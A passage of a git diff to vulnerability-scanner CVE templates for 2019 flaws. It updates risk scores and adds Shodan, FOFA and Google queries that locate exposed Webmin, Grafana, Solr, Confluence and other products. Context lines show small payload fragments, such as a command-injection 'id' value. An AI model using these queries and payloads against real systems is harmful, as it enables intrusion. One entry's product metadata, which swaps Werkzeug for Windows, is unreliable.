b/http/cves/2019/CVE-2019-13462.yaml index e0e3d7ab2f..bfc8baf9d8 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: lansweeper product: lansweeper + shodan-query: http.title:"lansweeper - login" + fofa-query: title="lansweeper - login" + google-query: intitle:"lansweeper - login" tags: cve,cve2019,sqli,lansweeper http: diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 08021f5efb..ca9333990a 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-14205 cwe-id: CWE-22 epss-score: 0.06233 - epss-percentile: 0.93435 + epss-percentile: 0.93579 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index bc8da14282..841dd84ca3 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14223 cwe-id: CWE-601 - epss-score: 0.00188 - epss-percentile: 0.56356 + epss-score: 0.00205 + epss-percentile: 0.58403 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 6f45634cfd..2220dd470f 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14251 cwe-id: CWE-22 - epss-score: 0.01653 - epss-percentile: 0.87315 + epss-score: 0.02152 + epss-percentile: 0.89306 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 08b0349f1c..3859d0338b 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-14312 cwe-id: CWE-22 - epss-score: 0.02354 - epss-percentile: 0.89553 + epss-score: 0.02466 + epss-percentile: 0.90034 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 8e6f97ac13..82691a077a 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -21,13 +21,14 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14322 cwe-id: CWE-22 - epss-score: 0.65161 - epss-percentile: 0.97821 - cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* + epss-score: 0.64382 + epss-percentile: 0.97881 + cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* metadata: max-request: 3 - vendor: palletsprojects - product: werkzeug + vendor: microsoft + product: windows + shodan-query: cpe:"cpe:2.3:o:microsoft:windows" tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects http: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 0c41cb85cf..f73c464c93 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -21,14 +21,17 @@ info: cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 - epss-score: 0.81752 - epss-percentile: 0.98283 + epss-score: 0.80535 + epss-percentile: 0.98316 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: open-emr product: openemr + fofa-query: icon_hash=1971268439 + shodan-query: http.html:"openemr" + google-query: intitle:"openemr" tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr http: diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 9e0ed0b297..e8850b212d 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00618 - epss-percentile: 0.78345 + epss-percentile: 0.78754 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 38dda391f5..8fec196e82 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -21,14 +21,16 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14750 cwe-id: CWE-79 - epss-score: 0.05107 - epss-percentile: 0.92161 + epss-score: 0.04425 + epss-percentile: 0.92392 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: osticket product: osticket shodan-query: title:"osTicket" + fofa-query: title="osticket" + google-query: intitle:"osticket" tags: cve,cve2019,packetstorm,osticket,xss,intrusive variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 66a4abe1ab..08e26250cf 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46015 + epss-percentile: 0.46981 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 68f14ab6ba..faed20e703 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: sugarcrm product: sugarcrm + shodan-query: http.html:"sugarcrm inc. all rights reserved" + google-query: intitle:sugarcrm + fofa-query: body="sugarcrm inc. all rights reserved" tags: cve,cve2019,xss,sugarcrm,edb http: diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 8bc0934895..a61ed1018a 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 - epss-score: 0.19454 - epss-percentile: 0.95868 + epss-score: 0.28071 + epss-percentile: 0.96836 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve,cve2019,grafana,dos,intrusive variables: payload: '{{repeat("A", 4000)}}' diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 7df1567ee3..7efed427ef 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: webmin product: webmin + shodan-query: http.title:"webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2019,packetstorm,webmin,rce,kev,edb http: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 4a25a49c3e..ccd1096340 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.69072 + epss-percentile: 0.69634 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: lsoft product: listserv shodan-query: http.html:"LISTSERV" + fofa-query: body="listserv" tags: cve2019,cve,xss,listserv,edb,lsoft http: diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 092de77f40..925da743ae 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -30,6 +30,8 @@ info: vendor: webmin product: webmin shodan-query: title:"Webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2019,webmin,rce variables: cmd: '`id`' diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index fc1dc3ea2d..1acb34a7ea 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -26,8 +26,8 @@ info: vendor: my_calendar_project product: my_calendar framework: wordpress + fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index fd23065c70..144637db9b 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -28,6 +28,8 @@ info: product: gallery_photoblocks framework: wordpress publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/ + fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/ tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index b2aa43d1ab..fa7f1d7ba5 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-15858 cwe-id: CWE-306 - epss-score: 0.036 - epss-percentile: 0.91432 + epss-score: 0.02804 + epss-percentile: 0.90638 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index c4b5e7f4dd..5717c86fcc 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15889 cwe-id: CWE-79 - epss-score: 0.03568 - epss-percentile: 0.90679 + epss-score: 0.03259 + epss-percentile: 0.91254 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: wordpress_download_manager framework: wordpress tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 9838f0edb4..6451b4d66f 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -30,6 +30,7 @@ info: vendor: dlink product: dns-320_firmware shodan-query: html:"ShareCenter" + fofa-query: body="sharecenter" tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink http: diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index e8109ac01c..481ab5c4b8 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: linuxfoundation product: harbor + shodan-query: http.favicon.hash:657337228 + fofa-query: icon_hash=657337228 tags: cve,cve2019,intrusive,harbor,linuxfoundation http: diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 40a05482d5..03c8285e4f 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16278 cwe-id: CWE-22 - epss-score: 0.97374 - epss-percentile: 0.99893 + epss-score: 0.97408 + epss-percentile: 0.99926 cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16469.yaml b/http/cves/2019/CVE-2019-16469.yaml index 46dc9a6689..aeaded7539 100644 --- a/http/cves/2019/CVE-2019-16469.yaml +++ b/http/cves/2019/CVE-2019-16469.yaml @@ -28,6 +28,8 @@ info: vendor: adobe product: experience_manager shodan-query: http.component:"Adobe Experience Manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: cve,cve2019,aem,eli,csti variables: num1: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index d8e131f716..8951eeb3ae 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2019,cve,intrusive,rconfig,packetstorm,rce http: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 47efcb0933..a17f36a226 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -29,6 +29,8 @@ info: vendor: vbulletin product: vbulletin shodan-query: http.component:"vBulletin" + google-query: intext:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve,cve2019,rce,kev,seclists,vbulletin http: diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index bb94876d8a..83eb26ec1c 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-16931 cwe-id: CWE-79 - epss-score: 0.00244 - epss-percentile: 0.63842 + epss-score: 0.0016 + epss-percentile: 0.52613 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 8cdc7790f2..ad952bf0f0 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16997 cwe-id: CWE-89 - epss-score: 0.28294 - epss-percentile: 0.96427 + epss-score: 0.21998 + epss-percentile: 0.9646 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 4df57d8acb..1853e78164 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -27,6 +27,9 @@ info: max-request: 100 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: icon_hash=892542951 + google-query: intitle:"zabbix-server" tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix http: diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index b0a563e27c..5721c50f2a 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2019-17444 cwe-id: CWE-521 epss-score: 0.05344 - epss-percentile: 0.92917 + epss-percentile: 0.93079 cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* metadata: max-request: 1 vendor: jfrog product: artifactory framework: "-" + shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" tags: cve,cve2019,jfrog,default-login,- http: diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index af431413a6..f0f2c59aab 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-17538 cwe-id: CWE-22 - epss-score: 0.00878 - epss-percentile: 0.80703 + epss-score: 0.00811 + epss-percentile: 0.81728 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 3ee9fbb86f..174046ade5 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -27,6 +27,9 @@ info: max-request: 3 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast http: diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 54ec06a2a9..80bc418778 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 - epss-score: 0.12974 - epss-percentile: 0.95024 + epss-score: 0.11202 + epss-percentile: 0.95166 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: product: popup_maker framework: wordpress publicwww-query: "/wp-content/plugins/popup-maker/" + shodan-query: http.html:/wp-content/plugins/popup-maker/ + fofa-query: body=/wp-content/plugins/popup-maker/ tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic http: diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 4c359c861a..092aec940b 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -30,6 +30,7 @@ info: vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 + fofa-query: icon_hash=-1414548363 tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 27763a0edd..6812129e3c 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -18,14 +18,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-1821 cwe-id: CWE-20 - epss-score: 0.96882 - epss-percentile: 0.99686 + epss-score: 0.96792 + epss-percentile: 0.99681 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco product: evolved_programmable_network_manager shodan-query: http.title:"prime infrastructure" + fofa-query: title="prime infrastructure" + google-query: intitle:"prime infrastructure" tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco http: diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 62b60facee..0c182487f7 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -12,13 +12,15 @@ info: - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py - https://nvd.nist.gov/vuln/detail/CVE-2019-18371 + - https://github.com/password520/Penetration_PoC + - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-18371 cwe-id: CWE-22 - epss-score: 0.02376 - epss-percentile: 0.88739 + epss-score: 0.02789 + epss-percentile: 0.90617 cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index f7eabc9243..884b7bef1d 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -13,18 +13,23 @@ info: - https://github.com/igniterealtime/Openfire/pull/1498 - https://swarm.ptsecurity.com/openfire-admin-console/ - https://nvd.nist.gov/vuln/detail/CVE-2019-18393 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 - epss-percentile: 0.52584 + epss-percentile: 0.52637 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime product: openfire + shodan-query: http.title:"openfire admin console" + fofa-query: title="openfire" + google-query: intitle:"openfire" tags: cve,cve2019,openfire,lfi,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 31c241abc2..89dc5b1b26 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -13,18 +13,23 @@ info: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 - https://nvd.nist.gov/vuln/detail/CVE-2019-18394 + - https://github.com/sobinge/nuclei-templates + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-18394 cwe-id: CWE-918 - epss-score: 0.62096 - epss-percentile: 0.97541 + epss-score: 0.70889 + epss-percentile: 0.98041 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime product: openfire + shodan-query: http.title:"openfire admin console" + fofa-query: title="openfire" + google-query: intitle:"openfire" tags: cve,cve2019,ssrf,openfire,oast,igniterealtime http: diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index c7493dedb0..3cb803769b 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -28,6 +28,7 @@ info: vendor: cisco product: rv110w_firmware fofa-query: icon_hash="-646322113" + shodan-query: http.favicon.hash:"-646322113" tags: cve,cve2019,cisco,router,iot http: diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 5e38f81e01..2d3b16c8c7 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19368 cwe-id: CWE-79 epss-score: 0.00624 - epss-percentile: 0.78472 + epss-percentile: 0.78891 cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 9e47b5ea74..6ac759892a 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-20085 cwe-id: CWE-22 epss-score: 0.69009 - epss-percentile: 0.97908 + epss-percentile: 0.9799 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index cc7ccb3827..6a3e56e3e2 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -12,13 +12,14 @@ info: - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html - https://knassar702.github.io/cve/neon/ - https://nvd.nist.gov/vuln/detail/CVE-2019-20141 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46806 + epss-percentile: 0.47026 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index caa2762ebe..0d1d5a74ce 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-20210 cwe-id: CWE-79 epss-score: 0.00938 - epss-percentile: 0.81363 + epss-percentile: 0.83041 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index e6ded4687b..dc4e62d988 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica http: diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 8f2e603c54..0ac744ddd1 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -28,6 +28,8 @@ info: vendor: influxdata product: influxdb shodan-query: InfluxDB + fofa-query: title="influxdb - admin interface" + google-query: intitle:"influxdb - admin interface" tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata http: diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 356485c92b..56e051bd92 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.94292 - epss-percentile: 0.99135 + epss-score: 0.94801 + epss-percentile: 0.99268 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index 8499a113b6..86059f5e39 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 - epss-score: 0.97101 - epss-percentile: 0.99761 + epss-score: 0.97069 + epss-percentile: 0.99765 cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index ddd0b6a263..e4b05c5215 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -28,6 +28,7 @@ info: max-request: 5 vendor: atlassian product: confluence + shodan-query: http.component:"atlassian confluence" tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev variables: num1: "{{rand_int(800000, 999999)}}" diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index 1fff86f98c..6aeb1e5a2a 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-3403 cwe-id: CWE-863 epss-score: 0.00379 - epss-percentile: 0.72409 + epss-percentile: 0.72862 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index 57e9e6f394..6ad85ae4f0 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 - epss-score: 0.01441 - epss-percentile: 0.86327 + epss-score: 0.02947 + epss-percentile: 0.90832 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 0d1bd780bb..ed32bcca3a 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ 